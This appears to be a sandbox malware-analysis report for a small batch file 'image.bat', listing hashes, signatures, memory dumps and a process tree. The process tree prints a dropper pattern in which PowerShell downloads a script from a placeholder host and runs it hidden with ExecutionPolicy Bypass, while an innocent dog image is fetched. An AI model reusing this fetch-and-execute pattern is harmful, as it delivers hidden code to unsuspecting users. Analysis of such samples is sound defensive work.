8ca4fcbfc7ae6566a02358e2eb31b25ca5834a23fd2fc96fa1d0952ec5c88edb

General

Target

image.bat
Size

395B
MD5

13859b6b861d616f2a3e4923732af595
SHA1

971abd40868e15a2ac78f231f6aeed1b28e65879
SHA256

8ca4fcbfc7ae6566a02358e2eb31b25ca5834a23fd2fc96fa1d0952ec5c88edb
SHA512

b8a751bfa5d974efd1adb8ee358dca556d0103e2ca8df9a31bdc3ded0e84c42b932caad49bc90ad11107d08f81ea6b63bb3920f50d37f835c93cf6f3cab17213

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2060	powershell.exe
936	powershell.exe
2516	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 3028 wrote to memory of 2060	3028	cmd.exe	29
PID 3028 wrote to memory of 2060	3028	cmd.exe	29
PID 3028 wrote to memory of 2060	3028	cmd.exe	29
PID 3028 wrote to memory of 936	3028	cmd.exe	30
PID 3028 wrote to memory of 936	3028	cmd.exe	30
PID 3028 wrote to memory of 936	3028	cmd.exe	30
PID 3028 wrote to memory of 2516	3028	cmd.exe	32
PID 3028 wrote to memory of 2516	3028	cmd.exe	32
PID 3028 wrote to memory of 2516	3028	cmd.exe	32

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\image.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Invoke-WebRequest "https://static.onecms.io/wp-content/uploads/sites/24/2021/04/26/GettyImages-185743593-2000.jpg" -Outfile "doggy.jpg"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Invoke-WebRequest -Uri site hosting your powershell script -OutFile .\power.ps1;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -windowstyle hidden -NoProfile -ExecutionPolicy Bypass -file "power.ps1"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2516

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8927761b5240501437be70644c1bf8f8

SHA1
387004f2c4d8d2e4cdb12479d6c0f3be626ff629

SHA256
6415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8

SHA512
d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8927761b5240501437be70644c1bf8f8

SHA1
387004f2c4d8d2e4cdb12479d6c0f3be626ff629

SHA256
6415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8

SHA512
d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DKARHD4F6MZKXPDHM0EI.temp

Filesize
7KB

MD5
8927761b5240501437be70644c1bf8f8

SHA1
387004f2c4d8d2e4cdb12479d6c0f3be626ff629

SHA256
6415240ce8e979e74e7d7c1aef4ea2643613be8dd5dbaee7a16bafc8f01658c8

SHA512
d09d35022b8c00779310f907a2e127485fd920e5a1c063340501948bc245b6b9e2f6bb8b92c5d1c5313e287e270fca9fe45e70969859e3e211b199583f7ed039

Download Submit
memory/936-25-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/936-26-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

Filesize
9.6MB

Download
memory/936-24-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/936-23-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/936-22-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/936-21-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

Filesize
9.6MB

Download
memory/936-19-0x000007FEF4A40000-0x000007FEF53DD000-memory.dmp

Filesize
9.6MB

Download
memory/936-20-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/936-18-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/2060-4-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download
memory/2060-7-0x00000000026F0000-0x0000000002770000-memory.dmp

Filesize
512KB

Download
memory/2060-12-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2060-11-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2060-9-0x00000000026F0000-0x0000000002770000-memory.dmp

Filesize
512KB

Download
memory/2060-10-0x00000000026F0000-0x0000000002770000-memory.dmp

Filesize
512KB

Download
memory/2060-6-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2060-8-0x00000000026F0000-0x0000000002770000-memory.dmp

Filesize
512KB

Download
memory/2060-5-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/2516-33-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2516-35-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2516-34-0x0000000002560000-0x00000000025E0000-memory.dmp

Filesize
512KB

Download
memory/2516-32-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads